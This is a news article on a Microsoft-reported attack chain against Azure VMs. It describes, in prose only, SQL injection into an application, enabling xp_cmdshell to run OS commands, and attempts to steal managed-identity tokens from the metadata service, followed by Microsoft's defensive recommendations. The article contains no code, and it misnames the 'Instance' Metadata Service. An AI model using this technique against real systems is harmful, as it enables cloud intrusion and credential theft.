Azure Cloud VMs at Security Risk as Hackers Rely Heavily on Breached SQL Servers

Microsoft Security has warned hackers who are targeting Azure Cloud VMs by exploiting SQL servers that have been compromised. Offering a comprehensive look into this novel threat, Microsoft’s security researchers noted that this technique of lateral movement has already been documented in previous attacks targeted at virtual machines and Kubernetes clusters. The use of SQL servers in this context, however, is a first.

The attacked party’s environment is first infiltrated via an SQL injection loophole in an application. Once this gateway is breached, the criminal elements gain a high-level access into the Azure Virtual Machine’s SQL Server instance. This subsequently allows them to execute SQL commands and siphon off critical data such as information about databases, schemas, table names, database versions as well as read/write/delete permissions and network configuration.

Hackers Employ Intrusive Techniques

Riding on the permissions granted to a compromised application, the hackers can enable the ‘xp_cmdshell’ command. This allows them to run operating system (OS) commands via SQL, providing them an entryway into the host. Through this method, they use a recognized service for covert data extraction which remains under the radar of security products by evading undue suspicion.

In their next move, hackers attempt to access the Instant Metadata Service (IMDS) and acquire the cloud identity access key by tweaking the cloud identity of the victim’s SQL Server instance. In the Azure setup, managed identities are often allocated to resources for granting authentication with other cloud resources and services. This token, when captured, gives hackers a path to access any cloud resource the stolen identity has permissions for.

Microsoft’s Action Plan to Counter the Attacks

Based upon the attack patterns, Microsoft has recommended the use of its Microsoft Defender security suite, specifically Defender for Cloud and Defender for Endpoint to identify SQL injections and unusual SQLCMD activity, both of which were engaged in the attack under observation.

To further strengthen the security, Microsoft has proposed the application of the principle of least privilege when handing over user permissions. This crucial step can bring down the success rate of lateral movement attempts. Furthermore, Microsoft has provided hunting queries for Defender and Microsoft Sentinel in the appendix of the official report for community benefit.

While hackers were unsuccessful in leveraging the Instant Metadata Service technique due to errors, it remains a feasible approach that poses a grave threat to multiple organizations.